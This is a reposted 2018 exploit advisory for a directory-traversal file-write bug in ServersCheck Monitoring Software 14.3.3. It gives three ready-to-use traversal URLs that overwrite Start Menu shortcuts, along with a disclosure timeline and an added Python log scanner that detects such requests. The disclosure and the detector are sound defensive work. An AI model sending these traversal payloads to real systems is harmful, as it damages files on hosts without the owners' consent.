
TheHackerWorld Official

ServersCheck Monitoring Software 14.3.3 - Arbitrary File Write

# Exploit Title: ServersCheck Monitoring Software 14.3.3 - Denial of Service (PoC)
# Author: John Page (aka hyp3rlinx)
# Date: 2018-10-23
# Vendor: www.serverscheck.com
# Software Link: http://downloads.serverscheck.com/monitoring_software/setup.exe
# CVE: N/A
# References: 
# http://hyp3rlinx.altervista.org/advisories/CVE-2018-18552-SERVERSCHECK-MONITORING-SOFTWARE-ARBITRARY-FILE-WRITE-DOS.txt
# https://serverscheck.com/monitoring-software/release.asp
# Affected Component: "sensor_details.html" webpage the "id" parameter

# Security Issue
# ServersCheck Monitoring Software allows remote attackers to cause a denial of service 
# (menu functionality loss) by creating an LNK file that points to a second LNK file, if this 
# second LNK file is associated with a Start menu item. Ultimately, this behavior comes 
# from a Directory Traversal bug (via the sensor_details.html id parameter) that allows 
# creating empty files in arbitrary directories. 

# Exploit/POC
# DOS Command Prompt .LNK under Start Menu change <VICTIM> to desired user.

http://127.0.0.1:1272/sensor_details.html?id=../../../../Users/<VICTIM>/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Accessories/Command%20Prompt.lnk%00

# DOS Run .LNK under Start Menu 

http://127.0.0.1:1272/sensor_details.html?id=../../../../Users/<VICTIM>/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Accessories/Run.lnk%00

# DOS Internet Explorer .LNK from Start Menu 
http://127.0.0.1:1272/sensor_details.html?id=../../../../Users/<VICTIM>/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Internet Explorer.LNK%00

# The victim will get an error message from the server like "Error retrieving sensor details from database".
# After that, Internet Explorer, Command Prompt and Run are no longer available via the Start/Programs/Accessories/
# and Task Menu links. However, they can still be launched by other means. Tested successfully on
# Windows 7 OS

# [Disclosure Timeline]
# Vendor Notification: October 6, 2018
# Vendor acknowledgement: October 7, 2018
# Vendor release v14.3.4 : October 7th, 2018 
# CVE assigned by Mitre: October 21, 2018
# October 22, 2018 : Public Disclosure
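
For defenders, the following added example (not part of the original advisory or of ServersCheck's code) scans web access logs for `sensor_details.html` requests whose `id` parameter carries a null byte or parent-directory segments, including double-encoded forms. The log format, the sample lines, the function names and the `SAFE_ID` pattern are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: a legitimate id is a short plain token; the advisory does not
# document the real format, so adjust this pattern to the deployment.
SAFE_ID = re.compile(r"[A-Za-z0-9_-]{1,64}")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (common log format), not captured traffic.
SAMPLE_LOG = [
    '127.0.0.1 - - [23/Oct/2018:10:00:01 +0000] "GET /sensor_details.html?id=12 HTTP/1.1" 200 512',
    '127.0.0.1 - - [23/Oct/2018:10:00:02 +0000] "GET /sensor_details.html?id=..%2f..%2fexample%2fplaceholder.lnk%00 HTTP/1.1" 200 64',
    '127.0.0.1 - - [23/Oct/2018:10:00:03 +0000] "GET /sensor_details.html?id=%252e%252e%255cexample HTTP/1.1" 200 64',
    '127.0.0.1 - - [23/Oct/2018:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 900',
]

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_request(url):
    """Return the reasons the id parameter of sensor_details.html looks unsafe."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/sensor_details.html"):
        return []
    reasons = set()
    for raw in parse_qs(parts.query, keep_blank_values=True).get("id", []):
        value = fully_decode(raw)
        if "\x00" in value:
            reasons.add("null byte")
        if ".." in re.split(r"[\\/]", value):
            reasons.add("parent-directory segment")
        if not SAFE_ID.fullmatch(value):
            reasons.add("not a plain identifier")
    return sorted(reasons)

def scan(lines):
    """Return (line_number, reasons) for every log line with a suspicious id."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        reasons = check_request(match.group(1)) if match else []
        if reasons:
            hits.append((number, reasons))
    return hits
```

Hits dated before the upgrade to v14.3.4 are worth correlating with unexpected empty files on the host.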